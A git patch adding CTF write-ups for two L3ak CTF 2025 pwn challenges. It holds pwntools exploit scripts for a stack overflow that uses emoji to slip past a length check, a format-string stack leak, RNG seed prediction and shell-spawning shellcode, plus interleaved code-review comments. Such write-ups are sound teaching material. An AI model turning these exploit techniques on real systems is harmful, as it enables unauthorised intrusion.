From 7df580044e1fa54a31c6fe6fb92e0fc59c4f0762 Mon Sep 17 00:00:00 2001 From: furtest Date: Mon, 14 Jul 2025 09:27:19 +0200 Subject: [PATCH] Adds l3ak ctf 2025 --- content/writeups/2025/l3ak_ctf/_index.md | 7 + .../2025/l3ak_ctf/pwn/safe_gets/chall.zip | Bin 0 -> 3835 bytes .../2025/l3ak_ctf/pwn/safe_gets/exploit.py | 53 ++++++ .../2025/l3ak_ctf/pwn/safe_gets/index.md | 103 +++++++++++ .../2025/l3ak_ctf/pwn/the_goose/chall.zip | Bin 0 -> 3943 bytes .../2025/l3ak_ctf/pwn/the_goose/exploit.py | 62 +++++++ .../2025/l3ak_ctf/pwn/the_goose/index.md | 168 ++++++++++++++++++ .../2025/l3ak_ctf/pwn/the_goose/predict.c | 10 ++ 8 files changed, 403 insertions(+) create mode 100644 content/writeups/2025/l3ak_ctf/_index.md create mode 100644 content/writeups/2025/l3ak_ctf/pwn/safe_gets/chall.zip create mode 100755 content/writeups/2025/l3ak_ctf/pwn/safe_gets/exploit.py create mode 100644 content/writeups/2025/l3ak_ctf/pwn/safe_gets/index.md create mode 100644 content/writeups/2025/l3ak_ctf/pwn/the_goose/chall.zip create mode 100755 content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py create mode 100644 content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md create mode 100644 content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c diff --git a/content/writeups/2025/l3ak_ctf/_index.md b/content/writeups/2025/l3ak_ctf/_index.md new file mode 100644 index 0000000..57e6ddd --- /dev/null +++ b/content/writeups/2025/l3ak_ctf/_index.md @@ -0,0 +1,7 @@ ++++ +date = '2025-07-14T09:11:19+02:00' +draft = false +title = 'L3ak ctf' ++++ + +A ctf that seems to be fairly big, I didn't spend much time on it so only solved 2 rather easy pwn challenges. 
diff --git a/content/writeups/2025/l3ak_ctf/pwn/safe_gets/chall.zip b/content/writeups/2025/l3ak_ctf/pwn/safe_gets/chall.zip new file mode 100644 index 0000000000000000000000000000000000000000..c7e0276ce6dc7322834d10d3644197f651fbf5d1 GIT binary patch literal 3835 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 MAX_LEN: + print("[-] Input too long!") + sys.exit(1) +``` + +Thus the tricky part is to bypass this limit because we need to write at least 275 chars to have a big enough overflow. + +## Solve + +So what does the `len` function count ? It counts unicode codepoints which can be multiple bytes long. +So I replace the part of my payload responsible for filling up the buffer by 😄 emojis and after solving a stack alignment problem I get a shell and the flag. + +Here is my solve script (the interesting part). +```python +io = start() +payload = flat( + b"A"*74, + b"\x00", + "😄".encode("utf-8")*50, + b"A"*5, + pack((elf.symbols.win)+5) + ) +io.sendlineafter(b"Enter your input (max 255 bytes): ", payload) +io.interactive() +``` +And when running it we get the flag. 
+``` +>>> ./exploit.py REMOTE 34.45.81.67 16002 +[+] Opening connection to 34.45.81.67 on port 16002: Done +[*] Switching to interactive mode +$ cat flag.txt +L3AK{6375_15_4pp4r3n7ly_n3v3r_54f3} +[*] Interrupted +[*] Closed connection to 34.45.81.67 port 16002 +``` + 
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/chall.zip b/content/writeups/2025/l3ak_ctf/pwn/the_goose/chall.zip new file mode 100644 index 0000000000000000000000000000000000000000..799147230810a6d856bec86094b140f7520434f9 GIT binary patch literal 3943 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 literal 0 HcmV?d00001 
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py b/content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py
new file mode 100755
index 0000000..85debf3
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py
@@ -0,0 +1,62 @@
+#!/usr/bin/python3
+from pwn import *
+import subprocess
+
+# Allows you to switch between local/GDB/remote from terminal
+def start(argv=[], *a, **kw):
+ if args.GDB: # Set GDBscript below
+ exe = local_exe
+ return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+ elif args.REMOTE: # ('server', 'port')
+ return remote(sys.argv[1], sys.argv[2], *a, **kw)
+ elif args.SSH:
+ exe = remote_exe
+ s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
+ return s.process([exe] + argv)
+ else: # Run locally
+ exe = local_exe
+ return process([exe] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+break *highscore+276
+'''.format(**locals())
+
+
+# USE ./filename otherwise gdb will not work
+local_exe = './chall'
+remote_exe = 'REMOTE'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(local_exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+context.log_level = 'info'
+
+# ===========================================================
+# EXPLOIT GOES HERE
+# ===========================================================
+
+io = start()
+
+number = subprocess.run(["./predict"], capture_output=True).stdout
+io.sendlineafter(b"> ", b"GOD")
+io.sendlineafter(b'so GOD. how many honks?', number)
+
+io.sendlineafter(b"what's your name again?", b'%p')
+
+stack = int(io.recv().decode().split()[1], 16)
+stack -= 0x126 # Offset to our buffer
+
+# Space before return pointer 376
+sh = asm(shellcraft.amd64.linux.sh())
+
+payload = flat(
+ asm('nop')*100,
+ sh,
+ b'A'*(376-100-len(sh)),
+ pack(stack)
+ )
+io.sendline(payload)
+
+io.interactive()
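Review bot: The stack leak is parsed at `stack = int(io.recv().decode().split()[1], 16)`, which assumes a single recv() returns the whole `wow 0x... you're ...` line and that the pointer is the second whitespace-separated token; a short read or any extra output makes this raise or pick the wrong token. Anchoring on the prefix that the decompiled format string in the writeup shows is more robust: `io.recvuntil(b"wow ")` followed by `stack = int(io.recvuntil(b" ", drop=True), 16)`. The honk guess also fails silently if `./predict` exits non-zero, because `subprocess.run` is called without `check=True` and an empty `stdout` would then be sent as the guess. Since the seed race against the remote's `srand(time(NULL))` is only compensated by a fixed fudge in predict.c, a retry loop over a couple of candidate offsets would make the script reliable rather than link-dependent; the mutable default `argv=[]` in `start()` is harmless here only because the list is never mutated.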
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md b/content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md
new file mode 100644
index 0000000..e48a703
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md
@@ -0,0 +1,168 @@ ++++ +date = '2025-07-14T09:16:28+02:00' +draft = false +title = 'The goose' +tags = [ "pwn" ] ++++ + +description: When the honking gets tough, you better brush up on your basics. +Author: dsp + +For this challenge we are given the binary and the Dockerfile +``` +>>> pwn checksec --file=chall <<< +[*] 'l3ak_ctf/pwn/the_goose/chall' + Arch: amd64-64-little + RELRO: Partial RELRO + Stack: No canary found + NX: NX unknown - GNU_STACK missing + PIE: PIE enabled + Stack: Executable + RWX: Has RWX segments + Stripped: No +``` + +No stack canary and executable stack we can already guess this will involve a shellcode. + +## Exploration + +``` +>>> the_goose ./chall +Welcome to the goose game. +Here you have to guess a-priori, how many HONKS you will receive from a very angry goose. +Godspeed. +How shall we call you? +> GOD + +so GOD. how many honks?10 + + HONK ... HONK +tough luck. THE GOOSE WINS! GET THE HONK OUT! +``` + +So it seems like we have to guess the number of HONKs from the goose. +Let's fire up ghidra and look at what we facing. + +```C +int main(void) +{ + int iVar1; + time_t tVar2; + + setvbuf(stdout,(char *)0x0,2,0); + tVar2 = time((time_t *)0x0); + srand((uint)tVar2); + setuser(); + iVar1 = rand(); + nhonks = iVar1 % 0x5b + 10; + iVar1 = guess(); + if (iVar1 == 0) { + puts("tough luck. THE GOOSE WINS! GET THE HONK OUT!"); + } + else { + highscore(); + } + return 0; +} +``` + +The number of honks are generated by `rand()` which is seeded with the current time. +If we correctly guess the number of honks we go inside of the highscore function. +```C +void highscore(void) +{ + undefined message_buffer [128]; + char buffer_random [31]; + undefined local_d9; + undefined name_buffer [32]; + char success_message [74]; + + /* The message is written one char at a time I placed everything on the same line to make it readable */ + success_message = "wow %s you\'re so go what message would you like to leave to the world?" 
+ success_message[0x49] = '\0'; + printf("what\'s your name again?"); + scanf("%31s",name_buffer); + local_d9 = 0; + sprintf(buffer_random,success_message,name_buffer); + printf(buffer_random); + read(0,message_buffer,0x400); + printf("got it. bye now."); + return; +} +``` + +The highscore function has a really obvious buffer overflow on the call to `read` that would allow us to inject shellcode and jump to it. +So there are two steps to this challenge : +1. Guessing the number of honks +2. Exploiting the `highscore` function to get a shell + +## Guessing the number of honks + +The random number generator is initialised using `srand(time(NULL))` which makes the seed the second of the call to `srand`. +We also know how the number of honks is calculated (`nhonks = iVar1 % 0x5b + 10;`). +From there we can easily compute the number with a small C program +```C +#include +#include +#include + +int main(void) +{ + srand(time(NULL)); + printf("%d", (rand() % 0x5b + 10)); + return 0; +} +``` + +After compiling we can call it from a pwntools script and correctly guess the number of honks (if you are on a slow link you can add 1 or 2 to the `srand` time). +```python +number = subprocess.run(["./predict"], capture_output=True).stdout +io.sendlineafter(b"> ", b"GOD") +io.sendlineafter(b'so GOD. how many honks?', number) +``` + +## Exploiting the highscore function + +Using the buffer overflow on the `read` call we can easily place a shellcode on the stack (there is no NX). +The only problem is finding the address of something on the stack to be able to jump to our shellcode. +This can be done using the format string vulnerability when we are asked for our name again. Giving `%p` as the name we are able to leak a pointer to the stack. 
+The last step is to calculate the offsets and finish writing the exploit scrip
+
+## Putting it all together
+
+```python
+io = start()
+
+number = subprocess.run(["./predict"], capture_output=True).stdout
+io.sendlineafter(b"> ", b"GOD")
+io.sendlineafter(b'so GOD. how many honks?', number)
+
+io.sendlineafter(b"what's your name again?", b'%p')
+
+stack = int(io.recv().decode().split()[1], 16)
+stack -= 0x126 # Offset to our buffer
+
+# Space before return pointer 376
+sh = asm(shellcraft.amd64.linux.sh())
+
+payload = flat(
+ asm('nop')*100,
+ sh,
+ b'A'*(376-100-len(sh)),
+ pack(stack)
+ )
+io.sendline(payload)
+
+io.interactive()
+```
+
+We run it and there we go
+```
+>>> ./exploit.py REMOTE 34.45.81.67 16004 <<<
+[+] Opening connection to 34.45.81.67 on port 16004: Done
+[*] Switching to interactive mode
+got it. bye now.$ cat /flag.txt
+L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}
+[*] Interrupted
+[*] Closed connection to 34.45.81.67 port 16004
+```
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c b/content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c
new file mode 100644
index 0000000..d01ca0e
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c
@@ -0,0 +1,10 @@
+#include
+#include
+#include
+
+int main(void)
+{
+ srand(time(NULL) + 1);
+ printf("%d", (rand() % 0x5b + 10));
+ return 0;
+}
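Review bot: predict.c seeds with `srand(time(NULL) + 1)`, a hard-coded one-second latency fudge, while the listing of the same program in the writeup seeds with plain `time(NULL)` and tells the reader to "add 1 or 2" by hand; the two should agree, and a comment such as `/* +1 compensates for the link delay between our time() and the server's srand(time(NULL)) */` would explain the constant. Taking the offset from the command line avoids recompiling for each link: `int off = argc > 1 ? atoi(argv[1]) : 1;` then `srand(time(NULL) + off);` with `int main(int argc, char **argv)`. The prediction is presumably only valid when this program is built against the same libc `rand()` implementation as the challenge binary (glibc on both sides); a musl or BSD build would give a different sequence for the same seed, which is worth a comment. As rendered here the three `#include` lines carry no header name, likely `<stdio.h>`, `<stdlib.h>` and `<time.h>` lost to extraction; confirm the committed file has them.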